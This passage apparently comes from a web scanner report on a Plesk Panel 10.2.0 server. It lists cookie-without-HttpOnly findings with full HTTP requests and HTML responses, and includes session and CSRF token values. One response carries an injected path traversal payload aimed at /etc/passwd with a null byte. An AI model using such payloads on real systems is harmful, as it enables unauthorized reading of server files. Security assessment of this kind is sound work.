   <td><input type="checkbox" class="checkbox" name="internal" id="fid-internal" value="true" ></td>
</tr>

<tr>
   <td class="name"><label for="fid-private">Show to me only</label></td>
   <td><input type="checkbox" class="checkbox" name="private" id="fid-private" value="true" CHECKED ></td>
</tr>

</table>

<input type="hidden" name="cb_id" value="0">

</td></tr></table></fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-finish" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply the changes made on this screen and exit the wizard.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);document.forms[0].wizaction.value=&quot;finish&quot;; return update_oC(document.forms[0]);;return false;" style=""><BUTTON name="bname_finish" id="buttonid-finish" type="submit" onClick="Event.stop(event);document.forms[0].wizaction.value=&quot;finish&quot;; return update_oC(document.forms[0]);;return false;">Finish</BUTTON><SPAN id="spanid-finish">Finish</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizstep" value="1"><input type="hidden" name="wizard" value="/plesk/client@2/custom-buttons/custom-button@new/properties/"><input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.13. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/create/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/backup/create/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/backup/create/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/backup/ftp-repository/
Cookie: PLESKSESSID=544bdaf6dd2753ce86a143b36e3245b8; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:39:40 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:39:39 GMT
Connection: close
Content-Length: 17420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="48333f77aef379c04c82252b59636182" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fbackup%252F%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fdbbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Back Up Data Related to the Subscription <span class="name">nosedivesailing.com</span></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.backup.create/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/backup/ftp-repository/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
function splitBackupChanged()
{
   if ( $('fid-split_backup_checkbox').checked ) {
       $('fid-split_backup').value = "true";
       $('fid-split_backup_size').enable();
   } else {
       $('fid-split_backup').value = "false";
       $('fid-split_backup_size').disable();
   }
}

function suspendDomainChanged()
{    
   if ( $('fid-suspend_domain_checkbox').checked ) {
       $('fid-suspend').value = "true";
       $('suspend_domain_warning').show();
   } else {
       $('fid-suspend').value = "false";
       $('suspend_domain_warning').hide();
   }
}

function contentChanged()
{    
   content = $('fid-backup_content_all').checked;    
   content_options = $('fid-content_type');
   if( content_options )
       content_options.disabled = !content;
}

function initScreen()
{
   $('fid-split_backup_checkbox').observe('click', splitBackupChanged);
   if( $('fid-suspend_domain_checkbox') )
       $('fid-suspend_domain_checkbox').observe('click', suspendDomainChanged);
   
   splitBackupChanged();
   if( $('fid-suspend_domain_checkbox') )
       suspendDomainChanged();
       
   $('fid-backup_content_all').observe('click', contentChanged);
   $('fid-backup_content_configuration').observe('click', contentChanged);
   contentChanged();
}

if (Prototype.Browser.IE) {
   Event.observe(window, "load", initScreen);
} else {
   Event.observe(document, "dom:loaded", initScreen);
}

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"Backup Manager: Personal FTP Repository","href":"\/plesk\/client@2\/domain@1\/backup\/ftp-repository\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/backup/create/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="48333f77aef379c04c82252b59636182">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <div class="formArea">
<fieldset><legend>Backup settings</legend><table class="formFields" cellspacing="0" width="100%">

   <tr id="row-prefix">
       <td class="name"><label for="fid-prefix">Add prefix to backup name</td>
       <td><input type="text" name="prefix" id="fid-prefix" value="" size="30" ></td>
   </tr>
   <tr id="row-comment">
       <td class="name"><label for="fid-comment">Comments</td>
       <td><textarea class='comment' name="comment" id="fid-comment" rows="5" cols="50" wrap="off">Domain backup.
Creation date: May 23, 2011 02:39 PM</textarea>
       </td>
   </tr>
   
   <tr id="row-split_backup_size">
       <td class="name"><label for="fid-split_backup_checkbox">Create multivolume backup</label></td>
       <td>
           <input type="checkbox" class="checkbox" name="split_backup_checkbox" id="fid-split_backup_checkbox" />
           <input type="hidden" id="fid-split_backup" name="split_backup" value="" />
           <label for="fid-split_backup_size">Volume size&nbsp;</label>
           <input type="text" name="split_backup_size" id="fid-split_backup_size" value="2047" size=8 maxlength=8 />MB
       </td>
   </tr>

   <tr id="row-repository">
       <td class="name">Store backup in</td>
       <td>

           <div class="option"><input name="repository" id="fid-store_repository-local" value="local" type="radio" class="radiobox" checked>&nbsp;<label for="fid-store_repository-local">Server repository</label></div>


           <div class="option"><input name="repository" id="fid-store_repository-ftp" value="ftp" type="radio" class="radiobox" disabled>&nbsp;<label for="fid-store_repository-ftp">Personal FTP repository</label><span class="hint"> (FTP repository settings are not specified)</span>


           </div>
       </td>
   </tr>
   
   <tr id="row-email">
       <td class="name"><label for="fid-email">When backup task is completed, send notification e-mail to</label></td>
       <td><input type="text" name="email" id="fid-email" value="" size="30" maxlength="254"></td>
   </tr>
   
</table></fieldset>

<fieldset><legend>Backup content</legend><table class="formFields" cellspacing="0" width="100%">

   <tr>
       <td class="name">Back up</td>
       <td>
           <div class="option"><input name="content" id="fid-backup_content_configuration" value="configuration" type="radio" class="radiobox" checked />&nbsp;<label for="fid-backup_content_configuration">
               Domain configuration
           </label></div>
           <div class="option"><input name="content" id="fid-backup_content_all" value="configuration_and_content" type="radio" class="radiobox" />&nbsp;<label for="fid-backup_content_all">
               Domain configuration and content
           </label>&nbsp;<select name="content_type" id="fid-content_type" >    <option value='backup_content_all_at_domain' SELECTED>All configuration and content</option>
   <option value='backup_content_vhost_only'>All configuration and content except mail</option>
   <option value='backup_content_mail_only'>Only mail configuration and content</option>
</select>
</div>
       </td>
   </tr>


   <tr>
       <td class="name"><label for="fid-suspend_domain_checkbox">Suspend domain until backup task is completed</label></td>
       <td class="withWarning"><input type="checkbox" class="checkbox" name="suspend_domain_checkbox" id="fid-suspend_domain_checkbox" value="true" />
       <input type="hidden" id="fid-suspend" name="suspend" value="" />
       <span id='suspend_domain_warning' style="display:none;" class="warningHint">Domain will be unavailable during the backup process</span>
       </td>
   </tr>


</table></fieldset>
</div>


   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote"></td>
           <td class="misc" width="0" nowrap><DIV class="commonButton" id="bid-backup-now" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to back up data.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lsubmit(document.forms[0]);;return false;" style=""><BUTTON name="bname_backup_now" id="buttonid-backup-now" type="button" onClick="Event.stop(event);lsubmit(document.forms[0]);;return false;">Back Up</BUTTON><SPAN id="spanid-backup-now">Back Up</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to cancel backup creation and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></td>
       </tr></table>
   </div>


</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.14. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/ftp-repository/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/backup/ftp-repository/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/backup/ftp-repository/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/backup/ftp-repository/properties/
Cookie: PLESKSESSID=544bdaf6dd2753ce86a143b36e3245b8; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:39:32 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:39:31 GMT
Connection: close
Content-Length: 20154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="48333f77aef379c04c82252b59636182" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fbackup%252F%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fdbbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500WebController' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Backup Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.backup.ftp-repository/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/backup/ftp-repository/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="48333f77aef379c04c82252b59636182">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <div class="toolsArea">
   <fieldset>
   <legend>Tools</legend>
   <table width="100%" cellspacing="0" cellpadding="0" border="0">
   <tr><td>
       <div class="screenButtons">
           <DIV class="commonButton" id="bid-backup-now" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Back up the data related to the subscription vulnerable.host.fqdn.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/create/&#039;); return false;" style=""><BUTTON name="bname_backup-now" id="buttonid-backup-now" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/create/&#039;); return false;">Back Up</BUTTON><SPAN id="spanid-backup-now">Back Up</SPAN></DIV>
           <DIV class="commonButton" id="bid-backup-schedule" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Specify settings for scheduled backup.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/schedule/&#039;); return false;" style=""><BUTTON name="bname_backup-schedule" id="buttonid-backup-schedule" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/schedule/&#039;); return false;">Scheduled Backup Settings</BUTTON><SPAN id="spanid-backup-schedule">Scheduled Backup Settings</SPAN></DIV>
           <DIV class="commonButton" id="bid-upload" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Upload a backup file from your local computer to the server backup repository.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/local-repository/upload/&#039;); return false;" style=""><BUTTON name="bname_upload" id="buttonid-upload" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/local-repository/upload/&#039;); return false;">Upload Files to Server Repository</BUTTON><SPAN id="spanid-upload">Upload Files to Server Repository</SPAN></DIV>
           <DIV class="commonButton" id="bid-ftp-settings" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Specify settings for personal remote FTP repository where backup files should be stored.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/properties/&#039;); return false;" style=""><BUTTON name="bname_ftp-settings" id="buttonid-ftp-settings" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/properties/&#039;); return false;">Personal FTP Repository Settings</BUTTON><SPAN id="spanid-ftp-settings">Personal FTP Repository Settings</SPAN></DIV>
